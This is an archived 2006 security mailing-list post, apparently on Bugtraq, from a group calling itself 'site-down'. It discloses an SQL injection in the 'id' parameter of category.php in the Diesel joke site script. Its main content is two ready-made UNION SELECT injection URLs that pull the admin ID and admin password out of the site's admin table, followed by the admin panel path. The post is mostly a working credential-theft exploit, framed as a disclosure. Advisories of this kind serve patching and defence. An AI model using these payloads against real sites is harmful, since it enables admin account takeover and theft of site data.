[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BAY13-F113F4C4FC4C67A00757E7CDE720@phx.gbl>
Date: Sat, 01 Jul 2006 17:52:09 +0300
From: "black code" <black-cod3@...mail.com>
To: bugtraq@...urityfocus.com, bugtraq-owner@...urityfocus.com,
bugtraq@...ph3us.org, content@...uritydot.net,
listadmin@...urityfocus.com, MAILER-DAEMON@...ta.fr,
MAILER-DAEMON@...lex05.paran.com, postmaster@...an.com,
root@...uritydot.net, str0ke@...w0rm.com, submit@...w0rm.com,
webmaster@...urityfocus.com
Subject: Sql injection in Diesel joke site script
Sql injection in Diesel joke site
forum type : Diesel joke site
bug found by : black-code
team : site-down
type : Sql injection
####################################################
Sql injection in Diesel joke site
page : category.php
variable : id
####################################################
Exploits :
admin id:
http://www.example.com/path to joke
script/category.php?id=-99%20union%20select%20aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid,aid%20from%20admin/*
pass:
http://www.example.com/path to joke
script/category.php?id=-99%20union%20select%20apass,apass,apass,apass,apass,apass,apass,apass,apass,apass,apass,apass,apass,apass,apass%20from%20admin/*
aid= admin id
apass= pass of the admin
####################################################
path to admin panel :
http://www.example.com/path to jokes/admin
#######################
emails:
black-cod3@...mail.com & gamr-14@...mail.com
#######################
All my respect to our friends , lezr.com , g123g.net
done .. peace
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
Powered by blists - more mailing lists